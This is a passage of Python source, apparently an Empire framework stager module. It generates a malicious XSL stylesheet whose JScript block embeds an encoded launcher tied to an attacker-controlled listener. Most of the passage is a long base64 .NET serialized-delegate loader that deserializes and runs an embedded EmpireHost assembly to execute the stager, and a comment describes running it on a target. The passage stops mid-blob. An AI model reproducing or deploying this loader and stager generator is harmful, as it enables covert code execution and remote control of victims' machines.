'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
base64 = self.options['Base64']['Value']
obfuscate = self.options['Obfuscate']['Value']
obfuscateCommand = self.options['ObfuscateCommand']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
encode = False
if base64.lower() == "true":
encode = True
obfuscateScript = False
if obfuscate.lower() == "true":
obfuscateScript = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(
listenerName, language=language, encode=encode, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
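        # The JScript payload embedded below expects only the base64-encoded
        # command, so strip the "powershell ... -enc " prefix that
        # generate_launcher prepends.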
launcher = launcher.replace("powershell -noP -sta -w 1 -enc ","")
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
code = """<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
"""
code +="var EncodedPayload = \"" + launcher + "\"\n"
code += """
/*
Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer.
*/
function setversion() {
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
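// The blob below is a base64-serialized .NET delegate chain (a
// DotNetToJScript-style loader): deserializing it yields a delegate whose
// DynamicInvoke calls Assembly.Load on the embedded EmpireHost assembly;
// CreateInstance('EmpireHost') then exposes ExecuteStager(EncodedPayload).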
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAHoAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAIvEzWQAAAAAA"+
"AAAA4AAiIAsBMAAAcgAAAAYAAAAAAADGkQAAACAAAACgAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAOAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAdJEA"+
"AE8AAAAAoAAAiAMAAAAAAAAAAAAAAAAAAAAAAAAAwAAADAAAADyQAAAcAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAADMcQAAACAAAAByAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAiAMAAACg"+
"AAAABAAAAHQAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAwAAAAAIAAAB4AAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAKiRAAAAAAAASAAAAAIABQBIPQAA9FIAAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEzACAB4AAAAB"+
"AAARKBEAAAoDKBIAAApvEwAACgp+AQAABAZvCwAABhcqHgIoFAAACioucwQAAAaAAQAABCoAABsw"+
"AwDmAAAAAgAAEQJzFAAACn0HAAAEAigUAAAKKBUAAAoKBnIBAABwcxYAAApvFwAACgICcw0AAAZ9"+
"BAAABAICewQAAAQGKBgAAAp9BQAABAJ7BQAABG8ZAAAKAnsHAAAECwcoGgAACgIoGwAACn0GAAAE"+
"3gcHKBwAAArcAAJ7BgAABAJ7BQAABG8dAAAKcg0AAHAoOAAABgwWDSsiCAmaEwQCewYAAAQRBG8e"+
"AAAKAnsGAAAEbx8AAAomCRdYDQkIjmky2N4pAnsHAAAECwcoGgAACgJ7BgAABG8gAAAKAhR9BgAA"+
"BN4HBygcAAAK3NwqAAABKAAAAgBdAA1qAAcAAAAAAgDJABTdAAcAAAAAAgByAEq8ACkAAAAAHgJ7"+
"AgAABCoiAgN9AgAABCoeAnsDAAAEKiICA30DAAAEKgAAGzAFAMoAAAADAAARAyghAAAKLAEqAnsH"+
"AAAECgYoGgAACgIoGwAACn0GAAAE3gcGKBwAAArcAAJ7BgAABAJ7BQAABG8dAAAKAnsGAAAEA28i"+
"AAAKJgJ7BgAABHIjAABwbyMAAAomAnsGAAAEbyQAAApvJQAAChZvJgAAChgXbycAAAoELBgCewYA"+
"AAQXjRAAAAElFgSibygAAAom3jcCewYAAARvHwAACibeKQJ7BwAABAoGKBoAAAoCewYAAARvIAAA"+
"CgIUfQYAAATeBwYoHAAACtzcKgAAASgAAAIAFgANIwAHAAAAAAIArQAUwQAHAAAAAAIAKwB1oAAp"+
"AAAAABswBQAKAQAABAAAEQM5AwEAAAN1FgAAAQsHLAkHbykAAAoKKw4DcjsAAHAWFHMqAAAKCgJ7"+
"BwAABAwIKBoAAAoCKBsAAAp9BgAABN4HCCgcAAAK3AJ7BgAABAJ7BQAABG8dAAAKAnsGAAAEcmUA"+
"AHBvIgAACnJzAABwbyMAAAomcysAAAoTBBEEBm8sAAAKEQRvLQAACgJ7BgAABBEEbygAAAoNCW8u"+
"AAAKFjE9CRZvLwAACm8wAAAKdUMAAAETBREFKCEAAAotIQJ7BAAABG8xAAAKEQUWEQVvMgAAChhZ"+
"bzMAAApvNAAACt4pAnsHAAAEDAgoGgAACgJ7BgAABG8gAAAKAhR9BgAABN4HCCgcAAAK3NwqAAAB"+
"KAAAAgA0AA1BAAcAAAAAAgDtABQBAQcAAAAAAgBZAIfgACkAAAAAGzADABUAAAAFAAARAgMUKAkA"+
"AAbeCgoCBigKAAAG3gAqAAAAARAAAAAAAAAKCgAKGgAAARswAgBfAAAABgAAEQJ7BwAABAoGKBoA"+
"AAoCewYAAAQsHgJ7BgAABG81AAAKbzYAAAoXMwsCewYAAARvNwAACt4HBigcAAAK3AQXbzgAAAre"+
"GQsCewQAAARvMQAACgdvOQAACm80AAAK3gAqAAEcAAACAA0AKDUABwAAAAAAAAAARUUAGRUAAAHm"+
"Aig6AAAKbzsAAAp9CwAABAIoOgAACm88AAAKfQwAAAQCczYAAAZ9DQAABAIoPQAACgIDfQoAAAQq"+
"HgJ7CwAABCoeAnsMAAAEKhp+CQAABCoacokAAHAqHgJ7DQAABCoqFxYWFnM+AAAKKioCewgAAAQU"+
"/gMqMgJ7CgAABHsFAAAEKjYCewoAAAQDfQUAAAQqLnKXAABwcz8AAAp6LnI+AQBwcz8AAAp6Bipm"+
"AnsKAAAEF28GAAAGAnsKAAAEA28IAAAGKlICAnsIAAAEKBYAAAYCFH0IAAAEKlICAigVAAAGfQgA"+
"AAQCAygWAAAGKi4oQAAACoAJAAAEKh4Cew4AAAQqABswBwCBAAAABwAAEQIfCRYDcrYBAHAEcroB"+
"AHAoQQAACm9CAAAKc0MAAAoKBW9EAAAKCys/B29FAAAKDAhvRgAACig0AAAGDQIJF5pvRwAACihI"+
"AAAKEwQRBC0FFBMF3ikGCG9JAAAKEQQoSgAACm9LAAAKB29MAAAKLbneCgcsBgdvTQAACtwGKhEF"+
"KgAAAAEQAAACACcAS3IACgAAAAATMAkA/QAAAAgAABECHwkWA3K2AQBwBHK2AQBwKEEAAApvTgAA"+
"CgUoNQAABgpzTwAACgsWDCs2ByhQAAAKcr4BAHAYjRAAAAElFgYWCChRAAAKoiUXBhcIKFEAAAqi"+
"KFIAAApvUwAACiYIF1gMCAVvVAAACjLBByhQAAAKctQBAHAXjRAAAAElFgYWDgQoUQAACqIoUgAA"+
"Cm9TAAAKJgIfCxYHbzkAAApvTgAACihIAAAKb1UAAAooUAAACm9WAAAKDQlvMgAACi0DDgQqFhME"+
"KxoGFhEEKFEAAAoJKFcAAAosAxEEKhEEF1gTBBEEBW9UAAAKMtwCcvgBAHAJKFgAAApvNAAACiuV"+
"AAAAGzAJAPoBAAAJAAARAh8JFgNytgEAcARytgEAcChBAAAKb04AAAoFKDUAAAYKc08AAAoLFhME"+
"KzoHKFAAAApyvgEAcBiNEAAAASUWBhYRBChRAAAKoiUXBhcRBChRAAAKoihSAAAKb1MAAAomEQQX"+
"WBMEEQQFb1QAAAoyvHNZAAAKDA4EOcUAAAAWEwUOBG9aAAAKEwYrFxEGb1sAAAoTBxEFF1gTBQgR"+
"B29cAAAKEQZvTAAACi3g3gwRBiwHEQZvTQAACtwRBTmCAAAABxEFFy4HchoCAHArBXJGAgBwb1MA"+
"AAomDgRvWgAAChMGKywRBm9bAAAKEwgHKFAAAApybgIAcBeNEAAAASUWBhYRCChRAAAKom9dAAAK"+
"JhEGb0wAAAoty94MEQYsBxEGb00AAArcBwdvXgAAChdZF29fAAAKJgdyfAIAcG9TAAAKJgIfCxYH"+
"bzkAAApvTgAACnNZAAAKDShQAAAKcoACAHAXjRAAAAElFglvYAAACoxSAAABoihSAAAKEwkCHwsW"+
"EQlvQgAACihIAAAKb1UAAAooUAAACm9WAAAKEwoRCm8yAAAKLQwJb2AAAAosAgkqCCoWEwsrIgYW"+
"EQsoUQAAChEKKFcAAAosCgkRC29cAAAKK4QRCxdYEwsRCwVvVAAACjLUAnL4AQBwEQooWAAACm80"+
"AAAKOF3///8AAAEcAAACAIkAJK0ADAAAAAACAOEAORoBDAAAAAATMAUAKAAAAAoAABEOBAMEBRQo"+
"bgAABgoGLBcGb3kAAAYGb30AAAYoiwAABnNhAAAKKhQqEzAFACgAAAAKAAARDgQDBAUUKG4AAAYK"+
"BiwXBm95AAAGBm99AAAGKIsAAAZzYQAACioUKhooSAAACiouKEgAAAooiwAABioeAyhiAAAKKgAT"+
"MAIAKQAAAAsAABEoYwAACgooZAAACgMoZQAACgQoZgAACgUoYgAACgYoZQAACihmAAAKKgAAABMw"+
"AgApAAAACwAAEShjAAAKCihkAAAKAyhlAAAKBChmAAAKBShnAAAKBihlAAAKKGYAAAoqAAAAEzAJ"+
"ACIAAAAAAAAAAhwWKFAAAApymgIAcBeNEAAAASUWA6IoUgAACm9OAAAKKi4CHwwWA29OAAAKKhoo"+
"aAAACioeAyhnAAAKKgAAABMwCQAjAAAAAAAAAAIfDhYoUAAACnKwAgBwF40QAAABJRYDoihSAAAK"+
"b04AAAoqABMwCQAjAAAAAAAAAAIfDhYoUAAACnLKAgBwF40QAAABJRYDoihSAAAKb04AAAoqABMw"+
"BQBzAAAADAAAERiNQwAAASUWfmkAAAqiJRd+aQAACqIKAheNUwAAASUWHyadb2oAAAoLB45pGDM+"+
"BxeabzIAAAoWMR4GFgcXmhZvawAACgwSAihsAAAKKFAAAApvVgAACqIGFwcWmgcXmihYAAAKb1UA"+
"AAqiKwQGFwKiBioAEzAFAEgAAAANAAARGAJvVAAACnNtAAAKChYLKywCB29uAAAKb28AAAooNAAA"+
"BgwGFgcIFpoocAAACgYXBwgXmihwAAAKBxdYCwcCb1QAAAoyywYqSgJzWAAABn0OAAAEAihxAAAK"+
"KgATMAQAXwAAAAAAAAAFc3IAAAolb3MAAApy5AIAcAJzdAAACm91AAAKJW9zAAAKcgYDAHADc3QA"+
"AApvdQAACiVvcwAACnIuAwBwBHN0AAAKb3UAAAolb3MAAApyVgMAcAVzdAAACm91AAAKKiICFig5"+
"AAAGKhMwBADkAAAADgAAEXN2AAAKChQWAyg7AAAGCwIWAyg7AAAGDBQXAyg7AAAGDQIXAyg7AAAG"+
"EwQHCAkRBCg3AAAGEwVzdwAAChMGEQZyhAMAcG94AAAKJhEGcp4DAHByqAMAcG95AAAKJhEGcrgD"+
"AHARBW95AAAKJhEGcsQDAHAWjFcAAAFveQAACiYGEQZvegAAChqNQwAAASUWB6IlFwiiJRgJoiUZ"+
"EQSiEwcWEwgrMBEHEQiaEwkRCSh7AAAKLBpzdwAAChMGEQYRCRZvfAAACiYGEQZvegAAChEIF1gT"+
"CBEIEQeOaTLIBm99AAAKKiYCAxYoOwAABioAABMwAwBeAAAADwAAERQKAywVGyh+AAAKCgZy0gMA"+
"cCh/AAAKCisVAig9AAAGCgYoIQAACiwGfmkAAAoqBC0HcvYDAHArBXIOBABwCwIoIQAACi0NAnIw"+
"BABwByiAAAAKCwYHKH8AAAolCioAABswAgBwAAAAEAAAEXI0BABwCn6BAAAKBm+CAAAKDAgsEwhy"+
"lgQAcG+DAAAKdUMAAAEN3kbeCggsBghvTQAACtwohAAACgsHLAwHb4UAAAoohgAACirQGAAAASiH"+
"AAAKKIgAAAoLBywMB2+FAAAKKIYAAAoqfmkAAAoqCSoBEAAAAgASABgqAAoAAAAAGzABABQAAAAB"+
"AAARfmkAAAoKAig8AAAGCt4DJt4ABioBEAAAAAAGAAkPAAM0AAABGihkAAAKKh4DKGYAAAoqQiiJ"+
"AAAKKIoAAApziwAACipSDwEojAAACg8BKI0AAAoojgAACioucrYEAHBzPwAACnoaKI8AAAoqHgMo"+
"kAAACioaKGMAAAoqHgMoZQAACioaKJEAAAoqQiiSAAAKKJMAAApziwAACipCKJQAAAoolQAACnOW"+
"AAAKKlIPASiXAAAKDwEomAAACiiZAAAKKkIomgAACiibAAAKc4sAAAoqUg8BKIwAAAoPASiNAAAK"+
"KJwAAAoqGiidAAAKKh4DKJ4AAAoqLnJDBQBwcz8AAAp6LnLSBQBwcz8AAAp6LnJQBgBwcz8AAAp6"+
"LnLpBgBwcz8AAAp6HgIonwAACioqAgMUFChbAAAGKi4CAwQUFChcAAAGKj4CA36gAAAKBAUoXAAA"+
"Biq+KKEAAApvogAACm+jAAAKHDIMAgMEBQ4EKGQAAAYqKKQAAAoCAwQFDgQobwAABio2AgN+oAAA"+
"CiheAAAGKj4CA36gAAAKFBQoYAAABio+AgN+oAAACgQFKGAAAAYqviihAAAKb6IAAApvowAAChwy"+
"DAIDBAUOBChpAAAGKiikAAAKAgMEBQ4EKHUAAAYqSgIDfmkAAAp+aQAACihjAAAGKiYCAwQoYgAA"+
"Bio+AgN+oAAACgQFKGQAAAYqegIDc5oAAAYlBG+RAAAGJRZvlQAABgUOBChlAAAGKgAbMAMArAAA"+
"ABEAABEDKCEAAAosEQQoIQAACiwJAhQUKAEAACsqc6UAAAoKc6UAAAoLAyghAAAKLSQDDBYNKxUI"+
"CW9rAAAKEwQGEQRvpgAACgkXWA0JCG8yAAAKMuIEKCEAAAotJAQMFg0rFQgJb2sAAAoTBQcRBW+m"+
"AAAKCRdYDQkIbzIAAAoy4gZvpwAACgdvpwAACgIGBygBAAArEwbeFAcsBgdvTQAACtwGLAYGb00A"+
"AArcEQYqARwAAAIAJQBwlQAKAAAAAAIAHwCAnwAKAAAAAD4CA36gAAAKFBQoaQAABiouAgMEFBQo"+
"aQAABio+AgN+oAAACgQFKGkAAAYqegIDc5oAAAYlBG+RAAAGJRZvlQAABgUOBChqAAAGKiYCAwQo"+
"AgAAKyoAAAAbMAkA7AEAABIAABFzuAAABiUCb4wAAAZ9WAAABCUCb44AAAZ9VwAABCUCb5AAAAZ9"+
"VgAABCUCb5IAAAZ9WQAABAoCb5YAAAYLfqAAAAoMfqAAAAoNFhMEfqAAAAoTBRYTBn6gAAAKEwcW"+
"EwgCb5QAAAYTCQMtAwQsIgMtB3OlAAAKEAEELQdzpQAAChACAyioAAAKDAQoqAAACg0IfqAAAAoo"+
"qQAACi0NCX6gAAAKKKkAAAosVyAABAAAEwgRCCiqAAAKEwcWCAkRBxIIKK8AAAYtOSirAAAKEwsR"+
"Cx96MyQRBxEIKKwAAAoTBxYICREHEggorwAABi0TKKsAAApzrQAACnoRC3OtAAAKegYCb5gAAAYS"+
"BBEHEQgSBRIGEgkHKK0AAAYTChEKLCIRCiDHBAAAMxESDP4VDgAAGxEMEwzdrwAAABEKc60AAAp6"+
"0A4AABsohwAACtALAAACKIcAAAozIBcRBREGKLMAAAYlEQlviQAABnUOAAAbpQ4AABsTDN5xFxEF"+
"EQYosgAABiURCW+AAAAGdQ4AABulDgAAGxMM3lERB36gAAAKKKkAAAosBxEHKK4AAAoRBX6gAAAK"+
"KKkAAAosBxEFKK4AAAoIfqAAAAooqQAACiwGCCiuAAAKCX6gAAAKKKkAAAosBgkorgAACtwRDCpB"+
"HAAAAgAAAGgAAAAwAQAAmAEAAFEAAAAAAAAAOgIDBHOrAAAGKHAAAAYqKgIDBAUobQAABipGAgME"+
"fqAAAAoFDgQobwAABipmAgMEc6sAAAYlBW+iAAAGDgQOBShxAAAGKiYCFBQocQAABiobMAMAkwAA"+
"ABEAABFzpQAACgpzpQAACgsDKCEAAAotJAMMFg0rFQgJb2sAAAoTBAYRBG+mAAAKCRdYDQkIbzIA"+
"AAoy4gQoIQAACi0kBAwWDSsVCAlvawAAChMFBxEFb6YAAAoJF1gNCQhvMgAACjLiBm+nAAAKB2+n"+
"AAAKAgYHKAMAACsTBt4UBywGB29NAAAK3AYsBgZvTQAACtwRBioAARwAAAIADABwfAAKAAAAAAIA"+
"BgCAhgAKAAAAADoCAwRzqwAABih2AAAGKjICAwQFFBQodQAABipGAgMEfqAAAAoFDgQodQAABipm"+
"AgMEc6sAAAYlBW+iAAAGDgQOBSh3AAAGKiYCFBQoBAAAKyomAgMEKAQAACsqGzAKACMCAAATAAAR"+
"Ai0LcnwHAHBzrwAACnoDLB0Db7AAAAogAQIAADEQcowHAHByngcAcHOxAAAKegQsHQRvsAAACiAA"+
"AQAAMRBy1AcAcHLmBwBwc7EAAAp6c7gAAAYlAm+bAAAGfVgAAAQlAm+dAAAGfVcAAAQlAm+hAAAG"+
"fVYAAAQlAm+jAAAGfVkAAAQKfqAAAAoLfqAAAAoMAm+lAAAGDQMtFSAEBAAAKKoAAAoLBxYWKLIA"+
"AAorEwMoqAAACgsHIAQEAAAorAAACgsELRUgAgIAACiqAAAKDAgWFiiyAAAKKxMEKKgAAAoMCCAC"+
"AgAAKKwAAAoMByACBAAAFiiyAAAKCCAAAgAAFiiyAAAKBgJvnwAABn6gAAAKAm+pAAAGByABAgAA"+
"CCAAAQAAEgMCb6cAAAYorAAABhMEEQQfVzAMEQQsQxEEH1cuJSszEQQg7AMAAC4iEQQgxwQAADMh"+
"EgX+FQ4AABsRBRMF3bkAAAARBHOtAAAKehEEc60AAAp6EQRzrQAACnrQDgAAGyiHAAAK0AsAAAIo"+
"hwAACjMyc4oAAAYlByi0AAAGb4MAAAYlCCi0AAAGb4cAAAYlCW+JAAAGdQ4AABulDgAAGxMF3llz"+
"gQAABiUHKLMAAApvegAABiUIKLMAAApvfgAABiUJb4AAAAZ1DgAAG6UOAAAbEwXeJwd+oAAACiip"+
"AAAKLAYHKK4AAAoIfqAAAAooqQAACiwGCCiuAAAK3BEFKgBBHAAAAgAAAJcAAABiAQAA+QEAACcA"+
"AAAAAAAAHgJ7EwAABCoiAgN9EwAABCoeAnsUAAAEKiICA30UAAAEKh4CexUAAAQqIgIDfRUAAAQq"+
"HgJ7FgAABCoiAgN9FgAABCoeAnsXAAAEKiICA30XAAAEKh4CexgAAAQqIgIDfRgAAAQqHgJ7GQAA"+
"BCoiAgN9GQAABCoeAnsaAAAEKiICA30aAAAEKhMwAwA0AAAAFAAAEXO2AAAGCgZzpQAACn1PAAAE"+
"Am+0AAAKKAUAACsG/ga3AAAGc7YAAApvtwAACgZ7TwAABCoeAns7AAAEKoIDbzIAAAoggAAAADEL"+
"chwIAHBzuAAACnoCA307AAAEKh4CezwAAAQqggNvMgAACiD/fwAAMQtyHAgAcHO4AAAKegIDfTwA"+
"AAQqHgJ7PQAABCoiAgN9PQAABCoeAns+AAAEKiICA30+AAAEKh4Cez8AAAQqIgIDfT8AAAQqHgJ7"+
"QAAABCoiAgN9QAAABCoeAntBAAAEKiICA31BAAAEKgATMAIAQgAAAAAAAAACKBQAAAoDKCEAAAos"+
"C3IoCABwc68AAAp6BCghAAAKLAtyOAgAcHOvAAAKegIDKI0AAAYCBCiPAAAGAhcolwAABioeAntC"+
"AAAEKoIDbzIAAAoggAAAADELchwIAHBzuAAACnoCA31CAAAEKh4Ce0MAAAQqggNvMgAACiD/fwAA"+
"MQtyHAgAcHO4AAAKegIDfUMAAAQqHgJ7RAAABCoiAgN9RAAABCoeAntFAAAEKiICA31FAAAEKh4C"+
"e0YAAAQqIgIDfUYAAAQqHgJ7RwAABCoiAgN9RwAABCoeAntIAAAEKiICA31IAAAEKh4Ce0kAAAQq"+
"IgIDfUkAAAQqAAATMAIATQAAAAAAAAACKBQAAAoEKCEAAAosC3IoCABwc68AAAp6BSghAAAKLAty"+
"OAgAcHOvAAAKegIDKKAAAAYCBCicAAAGAgUongAABgIgAgAEACioAAAGKgAAABMwCQDLAAAAFQAA"+
"ESD/AAAAc7kAAAoKIP8AAABzuQAACgsg/wAAAHO5AAAKDAZvugAACg0Hb7oAAAoTBAhvugAAChMF"+
"Ai0DFisBFwMEBhIDBxIECBIFKLAAAAYtUCirAAAKEwYRBh96MzsGCW+7AAAKCBEFb7sAAAoHEQRv"+
"uwAACgItAxYrARcDBAYSAwcSBAgSBSiwAAAGLRMoqwAACnOtAAAKehEGc60AAAp6c4EAAAYlBm85"+
"AAAKb3oAAAYlB285AAAKb3wAAAYlCG85AAAKb34AAAYqABswCQAiAQAAFgAAESD/AAAACiD/AAAA"+
"CyD/AAAADH6gAAAKDX6gAAAKEwR+oAAAChMFBiiqAAAKDQcoqgAAChMECCiqAAAKEwUCLQMWKwEX"+
"AwQJEgARBBIBEQUSAiixAAAGLVcoqwAAChMGEQYfejNCCQYorAAACg0RBAcorAAAChMEEQUIKKwA"+
"AAoTBQItAxYrARcDBAkSABEEEgERBRICKLEAAAYtEyirAAAKc60AAAp6EQZzrQAACnpzigAABiUJ"+
"Bii1AAAGb4MAAAYlEQQHKLUAAAZvhQAABiURBQgotQAABm+HAAAGEwfePgl+oAAACiipAAAKLAYJ"+
"KK4AAAoRBH6gAAAKKKkAAAosBxEEKK4AAAoRBX6gAAAKKKkAAAosBxEFKK4AAArcEQcqAAABEAAA"+
"AgAmALvhAD4AAAAAEzAEACsAAAAXAAARc6UAAAoKFgsCByUXWAsYWii8AAAK0QwILAkGCG+mAAAK"+
"K+UGb6cAAAoGKgATMAQAKgAAABgAABFzpQAACgoWCysUBgIHGFoovAAACtFvpgAACgcXWAsHAzLo"+
"Bm+nAAAKBio2AntPAAAEA2+mAAAKKnICKBQAAAoC0BUAAAIohwAACii9AAAKfVUAAAQqAAAAQlNK"+
"QgEAAQAAAAAADAAAAHYyLjAuNTA3MjcAAAAABQBsAAAAyCIAACN+AAA0IwAA9B0AACNTdHJpbmdz"+
"AAAAAChBAABICAAAI1VTAHBJAAAQAAAAI0dVSUQAAACASQAAdAkAACNCbG9iAAAAAAAAAAIAAAFX"+
"P6IdCR4AAAD6ATMAFgAAAQAAAGYAAAAVAAAAWQAAALgAAAArAQAABAAAAL0AAAAmAAAATQAAAAIA"+
"AAAYAAAACAAAAC0AAABPAAAAAgAAABAAAAAJAAAAAQAAAAQAAAAJAAAAAgAAAAUAAAACAAAAAAAt"+
"EQEAAAAAAAoAMQzJFwYArAzJFwYAGQ3JFwYA1wsNFxMA6RcAAAYA/wuHEgYAgAyHEgYAYQyHEgYA"+
"AA2HEgYAzAyHEgYA5QyHEgYAFgyHEgYA6wuqFwYAyQuqFwYARAyHEgYAyBqSEQ4AThEiEg4Aigds"+
"Fw4AeQtsFw4AOwYiEgYArBOSEQ4AZwYiEgYAYQDjEA4AtxoiEg4AQgAiEg4AbRMiEgYAjRiSEQ4A"+
"YxxBHA4AyRFBHAYAOgWSEQYA9xNLEg4A0QZBHAYAwRGSEQ4AYBJBHAYAtxS9HA4ADQdBHAYAmQB8"+
"BA4AthNBHAYAbgB8BA4AxxNBHAYAKwB8BA4AWhAiEg4AFRgiEg4AUxkiEgYAbw/GHQYAkBaSEQ4A"+
"fAYiEgYA4wqSEQYAfAB8BAYAVR2HEgYANR2DAAYApBPGHQ4ATA5BHA4AUhhBHA4APBFBHA4AAQlB"+
"HA4AORRBHA4AuhlBHAYAnQySEQYAnhGSEQYArgvJFwYAog69HAYAMhySEQ4AdRUiEg4AeR1sFwYA"+
"7BaRDgYAiA+SEQ4AmRJsFw4ASAZsFw4APhhsFwYAxQhAGQ4AcAYiEg4Aax0iEg4AAxQiEg4AjQsi"+
"EgYA0QSRDgYAOROSEQYASAmSEQYAxRZAGQYA0QiSEQYApxSSEQYAkwCSEQYAohSSEQ4AVQAiEg4A"+
"QRQiEg4A5B0iEg4AaRkiEgYAFQnFAgYAuhuSEWcBxRQAAAYA1g/FAgYAiR2DAAYA6AqSEQYA3QiS"+
"EQYAAheSEQYAiRGSEQYAUhCqFxIAKhMCEQYAfhOSEQYAUROSEQoAxgiQFAYAOQCSEQAAAAC7AAAA"+
"AAABAAEAAQAQAGocAABBAAEAAQAAABAAOgkAAEEAAgAEAAAAEACgHAAAcQAIAA0AAAAQAOUGAACB"+
"AA4AHwABABAA+BcAAEEADwA3AAAAEAAkBwAAkQATAD8AgQEQAEQCAABBABMAWQChAAAAmhsAAAAA"+
"EwB5AAEAEACbGwAAQQATAHkAAQAQAHYbAABBABcAggCBARAAWxcAAEEAGwCLAAsBEgC5AgAAwQAb"+
"AIwAAgEAAHEOAADxACAAjAACAQAAWA4AAPEAKQCMAAIAEACXGQAAQQA7AIwAAgAQAHsZAABBAEIA"+
"mwCDARAATRcAAEEASgCsAAMBEAABAAAAQQBPALYAAgEAAMEHAADxAFAAuAAKABAAuQIAAEEAVQC4"+
